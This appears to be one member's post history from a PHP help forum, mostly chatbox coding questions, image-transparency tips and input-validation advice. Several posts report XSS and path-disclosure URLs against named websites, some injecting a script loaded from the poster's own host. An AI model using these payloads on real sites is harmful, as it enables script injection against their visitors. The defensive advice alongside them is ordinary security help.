helraizer

Members
  • Posts: 401

Everything posted by helraizer

  1. Full path disclosure http://two.team-who.co.uk/CaptchaSecurityImages.php?width=1p
  2. With the $_GET for page, use

         $page = htmlspecialchars($_GET['page']); // use your variables there

     which will change < and > to &lt; and &gt;, which means that the XSS will not work. Also do

         if (is_numeric($page)) {
             // code to display page of that number, either 1 or 2 in your case
         } else {
             // code here to give error message to user - if page is not numeric.
             // This will be if it is text or if it is an array.
         }

     Hope that helps, Sam
  3. Array: http://www.bjjnews.org/TUF/index.php?page[]
     XSS: http://www.bjjnews.org/TUF/index.php?page=2%3Cscript%20src=http://www.helraizer.co.uk/xss1.js%3E%3C/script%3E
  4. If you have your email openly on your site, unprotected (with @ and . rather than [at] and [dot] or similar) then it could well be a spam bot, else it could well be someone just testing it. Sam
  5. If you have say $user = $_GET['user']; then instead use $user = htmlspecialchars($_GET['user']); - That'll change < or > into &lt; or &gt;, thus rendering XSS obsolete. Sam
  6. http://clients.futuresolutions.com/fsi/usr/login http://clients.futuresolutions.com/fsi/content/page/services%22%3E http://clients.futuresolutions.com/fsi/content/user/login
  7. An annoyance, more than a problem, is that during registration you ask for the user's country twice, and yet still ask for zip code. England for one doesn't use zip codes, so how can they possibly be verified? I've registered now, it may take up to 24 to activate my account, if they'll activate it, that is. Sam
  8. XSS -
     http://iupgbsa.info/profile.php?user=%22%3E%3Cmarquee%3E%3Ch1%3Evunerable%3C/h1%3E%3C/marquee%3E
     http://iupgbsa.info/profile.php?user=15%22%3E%3Cscript%20src=http://www.helraizer.co.uk/xss1.js%3E%3C/script%3E
     - need to protect GET variables.
     http://iupgbsa.info/profile.php?user=15
     Just to name a few
  9. This code:

         <?php
         // Black 150x35 canvas
         $img = imagecreate(150, 35);
         $black = imagecolorallocate($img, 0, 0, 0);
         imagefill($img, 0, 0, $black);

         // Load the overlay and mark white as its transparent colour
         $im = imagecreatefrompng("14t0kxy.png");
         $white = imagecolorallocate($im, 255, 255, 255);
         $trans_white = imagecolortransparent($im, $white);

         // Copy the overlay onto the canvas at 100% opacity
         imagecopymerge($img, $im, 0, 0, 0, 0, 150, 35, 100);

         header("Content-type: image/png");
         imagepng($img);              // send to the browser
         imagepng($img, "image.png"); // and save a copy to disk
         imagedestroy($img);
         imagedestroy($im);
         ?>

     produces this:
     Slight oddity with the pink text but you get the idea. Sam
  10. If you want the white colour transparent you'd do this:

          $im = imagecreatefrompng("images/" . $goals[$goal]); // create image
          $white = imagecolorallocate($im, 255, 255, 255); // define a colour
          $trans_white = imagecolortransparent($im, $white); // define the colour as transparent

      Then to your last question: look up imagecopymerge, that allows you to insert one image on top of another, at varying levels of transparency (0 being invisible, 50 being faded in, 100 being the exact image on the main image). Hope that helps. Sam
  11. Say you had a database with all users in it, you'd have username, name, surname, title etc.. you'd also have an age column. Then pull from the database the age from the person doing the adding (user1) and that of the person being added (user2). So something like

          if ($user1_age > 18 && $user2_age < 18) {
              echo "You can't add a user under 18 for legal reasons!";
          }

      Something like that. Although, you might want to refine your ages.. at the moment a 19 year old can't add a 17 year old. That's not anything dodgy at all, and it limits people. This

          if ($user1_age > 25 && $user2_age < 16) {
              echo "You can't add a user under 16 for legal reasons!";
          }

      would probably be better. Sam
  12. Hi folks, I have a file for my chatbox called data.line, in which the posts are in the layout

          CHATBOXTEXT 7
          username=helraizer
          1202416953
          ip=86.140.73.183
          color=yellow
          font=palab
          message=bit of a bug, I admit
          ###
          username=Helraizer
          1202420235
          ip=86.140.73.183
          color=yellow
          font=palab
          message=Teeeeeeesting
          ###
          username=Fjar
          1202420306
          ip=81.77.39.76
          color=yellow
          font=palab
          message=I love you, my Sam
          ###
          username=helraizer
          1202420637
          ip=81.77.39.76
          color=aqua
          font=palab
          message=I love you too, my Fjar!! <3
          ###

      This is fine, when you post a comment it posts your data like this from a form using this code.

      index.php (only relevant code shown)

          <?php
          $text = htmlspecialchars(stripcslashes($_POST['input'] . "\n"));
          $username = htmlspecialchars(stripslashes($_POST['username']));
          $color = $_POST['color'];
          $font = $_POST['font'];
          $ip = $_SERVER['REMOTE_ADDR'] . "\n";
          $ip1 = mysql_real_escape_string($_SERVER['REMOTE_ADDR']);
          $_SESSION['username'] = $username;
          $_SESSION['color'] = $color;
          $current_time = mysql_real_escape_string(time());

          // One array element per field; each field ends in "\r"
          $data[] = "\n".trim("\nusername=".htmlspecialchars_decode(substr($username, 0, 10)) . "\r");
          $data[] = trim($current_time) . "\r";
          $data[] = "ip=".trim($ip1) . "\r";
          $data[] = "color=".trim($color) . "\r";
          $data[] = "font=".trim($font) . "\r";
          $data[] = "message=".htmlspecialchars_decode(trim(substr($text, 0, 75)) . "\r");
          $data[] = trim("###");

          //followed by later
          $datal = file_get_contents("data.line");
          if (stristr($datal, $_SERVER['REMOTE_ADDR'])) {
              echo "<a href='http://helraizer.dnsalias.net/Chat/index.php5?action=delete'><b>Delete your post</b></a>";
              $_SESSION['a'] = 1;
              if (isset($_SESSION['a']) && $_GET['action']=="delete") {
          ?>
          <table align='center'><tr><td><b>Post Deletion</b></td></tr><tr><td>
          <?php
                  $us_name = $_POST['user'];
                  echo "<form align='center' name='post' action='delete.php5' method='post'>";
                  echo "<label align='center' for='user'>Please enter the username you used in your post:</label>";
                  echo " <input type='text' align='center' id='usera' name='usera' size='10' maxlength='10'>";
                  echo " <input type='submit' value='Delete!' name='submita' id='submita'>";
          ?>
          </form></td></tr></table><br><br><br>
          <?php
              }
          }
          ?>

      Which is fine. It adds the new post after the previous, starting on a new line each time. It must do this or the script won't be able to read the file at all, or will pull the wrong information out and thus break the formatting.

      function.php

          <?php
          function ddfm_flock($handle, $param)
          {
              global $enable_file_locking;
              if ($enable_file_locking == TRUE) {
                  return flock($handle, $param);
              } else {
                  return TRUE;
              }
          }
          ?>

      Then finally in delete.php

          <?php
          if (isset($_POST['submita'])) {
              $entries = file_get_contents("data.line");
              $entries = (array) explode('###', $entries);
              foreach ($entries as $entry) {
                  $data_t = explode("\r", trim($entry));
                  if ($data_t[0] == "username=" . $_POST['usera']) {
                      // Parse the key=value fields of the matching entry
                      $data = array();
                      foreach ($data_t as $dt) {
                          if (strpos($dt, '=') != false) {
                              $k = substr($dt, 0, strpos($dt, '='));
                              $v = substr($dt, strpos($dt, '=') + 1, strlen($dt) - strpos($dt, '='));
                              $data[$k] = $v;
                          }
                      }
                      $data['timestamp'] = $data_t[1];

                      if (isset($_POST['usera'])) {
                          if (is_string($_POST['usera'])) {
                              $item = "username=" . $_POST['usera'];
                          }
                      }

                      // Despite its name, $the_ip ends up holding the text after "username="
                      $the_ip = "";
                      $entries = file_get_contents("data.line");
                      $entries = (array) explode('###', $entries);
                      foreach ($entries as $entry) {
                          $data_t = explode("\r", trim($entry));
                          if (trim($data_t[0]) == $item) {
                              foreach ($data_t as $d) {
                                  if (strpos($d, 'username=') === 0) {
                                      $the_ip = substr($d, 9, strlen($d) - 1);
                                  }
                              }
                          }
                      }

                      $entries = file_get_contents("data.line");
                      $entries = (array) explode('###', $entries);

                      // recreate file
                      $handle = fopen("data.line", "w");
                      if (ddfm_flock($handle, LOCK_EX)) { // do an exclusive lock
                          foreach ($entries as $entry) {
                              $data_t = explode("\r", trim($entry));
                              if (trim($data_t[0]) != "") { // if valid item
                                  foreach ($data_t as $d) {
                                      if (strpos($d, 'username=') === 0) {
                                          $test_ip = substr($d, 9, strlen($d) - 1);
                                      }
                                  }
                                  if ($test_ip != $the_ip) { // put back
                                      foreach ($data_t as $d) {
                                          fwrite($handle, $d . "\r");
                                      }
                                      fwrite($handle, "###\r");
                                  } else {
                                      // skip items from this IP
                                  }
                              }
                          }
                          ddfm_flock($handle, LOCK_UN); // release the lock
                      } else {
                      }
                  }
              }
          }
          ?>

      which adds a blank line to the chatbox and thus the chatbox returns the wrong values and format.. How would I stop it from adding this extra line? If I change fwrite($handle, "###\r") to fwrite($handle, "###") it makes data.line format as:

          CHATBOXTEXT 7
          username=helraizer
          1202416953
          ip=86.140.73.183
          color=yellow
          font=palab
          message=bit of a bug, I admit
          ###username=Fjar
          1202420306
          ip=81.77.39.76
          color=yellow
          font=palab
          message=I love you, my Sam
          ###username=helraizer
          1202420637
          ip=81.77.39.76
          color=aqua
          font=palab
          message=I love you too, my Fjar!! <3
          ###

      The username of the next post starts on the same line as the ### and the same problem occurs. Instead of reading

          [helraizer]bit of a bug, I admit (should be yellow)
          [Fjar] I love you my Sam!! (should be yellow)
          [helraizer]I love you too, my Fjar!! <3 (should be blue)

      it reads

          [palab]palab [202416953][202420306] helraizer

      ^all of them white (the default if $color is not specified or different to those it is supposed to be).

      How would I get it to, when I delete a post, print the comment (all information) starting on the line after the previous ###? Hope that makes sense. Just ask if you need more information. Thanks, Sam
  13. I suppose if the time is counted in seconds then with a typo 600 could easily become 60, could be as simple as that..
  14. Hi folks, In my script I have this code:

          <?php
          unset($errors);
          include("linesfile.php5");
          $filename = "data.line";
          set_magic_quotes_runtime(0);

          // Length checks on the submitted comment and username
          if ($_POST['submit'] && strlen($_POST['input']) < 5) {
              $errors[] .= _NO_5;
          }
          if ($_POST['submit'] && strlen($_POST['username']) < 3) {
              $errors[] .= _NO_2;
          }

          // Word filter
          $dirty = array('rude word', 'another rude word', 'etc');
          foreach ($dirty as $bad_word) {
              if (preg_match("/$bad_word/i", $_POST['input']))
                  $errors[] = 'The word you entered, "'.$bad_word.'", has been detected as being offensive; your post has not been submitted. Sorry for any inconvenience.';
          }
          ?>
          <div class="ddgb_entrybox">
          <table width="100%" border="0" cellspacing="8" cellpadding="0">
          <tr>
          <td width="42%" align="center" valign="top"></td>
          <td align="left" valign="top">
          <?php
          if (isset($_POST['submit']) && $errors[0] != null) {
              echo "<h2>" . _ERROR . "</h2><ul>";
              foreach ($errors as $f) {
                  echo "<li>" . $f . "</li>";
              }
              echo "</ul>";
          } elseif ($_POST['submit']) {
              // grab the inputted text
              $text = htmlspecialchars(stripcslashes($_POST['input'] . "\n"));
              $username = htmlspecialchars(stripslashes($_POST['username']));
              $color = $_POST['color'];
              $font = $_POST['font'];
              $ip = $_SERVER['REMOTE_ADDR'] . "\n";
              $ip1 = $_SERVER['REMOTE_ADDR'];
              $time = time();
              $_SESSION['username'] = $username;
              $_SESSION['color'] = $color;
              $data[] = "\n" . htmlspecialchars_decode(substr($username, 0, 10));
              $data[] = trim($color);
              $data[] = trim($font);
              $data[] = htmlspecialchars_decode(trim(substr($text, 0, 75)));

              //Process the post
              $datafile = new DataFile($filename);
              if (!$datafile->writeNewLine($data))
                  die("Error writing to file");
          }
          ?>

      I have a database set up called `chatbox` with a table `post` having the fields 'time' and 'ip'.

      The idea: when the user posts, their ip is stored in the database along with the time stamp from when they post using

          $sql = "INSERT INTO `chatbox`.`post` (`time`, `ip`) VALUES ('$time', '$ip')"; // $time being merely time() and $ip being $_SERVER['REMOTE_ADDR'];
          $result = mysql_query($sql) or die('Error in SQL: ' . mysql_error());

      I was planning to then query the database to see whether that ip (user) posted within the last 30 seconds ( if($row['time'] < ($time + 30)) { } ) if they have then $errors[] = 'You have already posted once, please wait 30 seconds to post again'; if not then it will post the form. I have the code to use but how would I implement this into my code? Thanks, Sam
  15. Hi Folks, I have a filtering system to clean up user input in the respect of swearing. The code I have at the moment is this:

          <?php
          $dirty = array('rude word', 'another', 'and another rude word', 'another, please Carol');
          foreach ($dirty as $bad_word) {
              $text = preg_replace("/$bad_word/i", "****", $text);
          }
          ?>

      So if the user inputted 'rude word me, it works!!!' and then 'and another rude word you' it'd turn into '**** me, it works!!!' and '**** you'. Which makes it look odd, so instead of the preg_replace I was thinking of throwing an error message (which I also have using $errors as an array).

          <?php
          define('_SWEAR', 'The word you entered, "'.$word.'", has been detected as being offensive; your post has not been submitted. Sorry for any inconvenience.'); // for the error.
          ?>

      How would I get it so that $word is the value in the $dirty array that the user inputted so it'd read:

          Error! - The word you entered, "rude word", has been detected as being offensive; your post has not been submitted. Sorry for any inconvenience.

      Otherwise it'd just pull out any if not all of the elements of the array. How would I do this? Thanks, Sam
  16. Thanks for the response. On the site layout or the chatbox? If the site: I think I will make the '.: Page Name :.' part white so they fit with the black better than the blue/purple does. Well, with the silver and blue banner at the top, with silver links I thought black would work the best with those colours. If it were white, say, the silver and blue wouldn't have such an impact. Any ideas of improvement? Sam
  17. Some people have tried to break it, so I now have implemented new systems. The username cannot be less than 3 characters nor longer than 10, the comment can only be between 5 and 75 characters. If someone makes their own form to submit values, and the colour and/or font are different to those in the list on my site, it will be returned as a default colour and/or font. All comments and usernames are truncated to 75 and 10 characters (respectively). Can anyone suggest any improvements? Sam (http://www.helraizer.co.uk/mychatbox)
  18. phpDesigner 2007 better not be free, I paid for a license but I agree with you, it is probably the best. Would it be worth looking at getting 2008?
  19. About SESSION he means like $_SESSION['s'] = 1000. That way no one can edit it and thus no one can cheat.
  20. Not sure about everyone else but we should have a little more time to edit a post. Currently if you make a post you have less than a minute to spot an error and change it (literally 60 seconds). This also means that if we can't edit the post after a certain time then we have to make a new post in order to show changes to the original post. Maybe it's just me, though, who thinks it should be slightly longer, maybe 3 - 5 minutes? What does everyone else think? Sam
  21. Hi folks, I have this site and idea http://www.helraizer.co.uk/mychatbox/ at the moment I'm using JavaScript to alert the user if they haven't entered a username or message but all this does is pop up an alert message and return false. However, if their browser does not support JavaScript (JavaScript is turned off) then it just won't send and will give them no reason why. How would I get it so that, using PHP, if the submit button is pressed and either the username is less than 3 characters and/or the comment field is less than 5 characters then above the image (on the site page) a list of errors would appear. So if nothing was wrong it shows no errors but if the username was less than 3 characters and comment <5 it'd appear "Error! -Your username is too short, please enter a username between 3 and 10 characters. -Your comment is too short, please enter a comment between 5 and 75 characters." (or similar) How would I do this? I know this is a "help" forum not a "do it for me" forum but if you guys can give me a baseline for this problem, to work with from there I can probably get it from there. Thanks, Sam
  22. Oh bugger. That would help.. wouldn't it.. http://www.helraizer.co.uk/mychatbox/ Sorry about that. Sam
  23. Hi folks, I have been working on this for a while, could you tell me what you think? The idea behind it is that it can be used as a forum signature, soon I will make a user system so people can have their own chatbox to use. So instead of Helraizer's Chatbox it'll have Username's chatbox (Username being their chosen username) but that's for later. How could either the chatbox or the website itself be improved/look better? Thanks, Sam
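
Added example, not part of the original posts: one way to handle the `page` parameter discussed in posts 2, 3 and 5, covering both the array form (`page[]`) and markup in the value. The function names, the two-page limit and the sample inputs are assumptions made for illustration.

```php
<?php
// Added example; parse_page_param() and h() are hypothetical helper names.

/**
 * Return a validated page number, or null when the input is unusable.
 * Covers ?page[]=x (array), ?page=2<script ...> (markup) and out-of-range values.
 */
function parse_page_param(array $query, int $maxPage = 2): ?int
{
    $raw = $query['page'] ?? '1';

    // ?page[] arrives as an array. Passing it to string functions raises
    // warnings that reveal the script's full path when display_errors is on.
    if (!is_string($raw)) {
        return null;
    }

    // ctype_digit() accepts only 0-9, so "2<script ...>" is rejected.
    // is_numeric() alone would also accept "1e3", " 2" and "-1".
    if ($raw === '' || !ctype_digit($raw) || strlen($raw) > 4) {
        return null;
    }

    $page = (int) $raw;
    return ($page >= 1 && $page <= $maxPage) ? $page : null;
}

/** Encode a value for an HTML text or quoted-attribute context. */
function h(string $value): string
{
    return htmlspecialchars($value, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
}

// Constructed sample inputs mirroring the request shapes listed above.
$samples = [
    ['page' => '2'],
    ['page' => ['']],
    ['page' => '2<script src=//example.invalid/x.js></script>'],
    ['page' => '1e3'],
];

foreach ($samples as $query) {
    $page  = parse_page_param($query);
    $shown = is_string($query['page']) ? $query['page'] : '(array)';
    echo $page === null
        ? 'Rejected: ' . h($shown) . "\n"
        : "Showing page $page\n";
}
```

Only the first sample is accepted; the rejected values are echoed through `h()` so they render as text rather than markup.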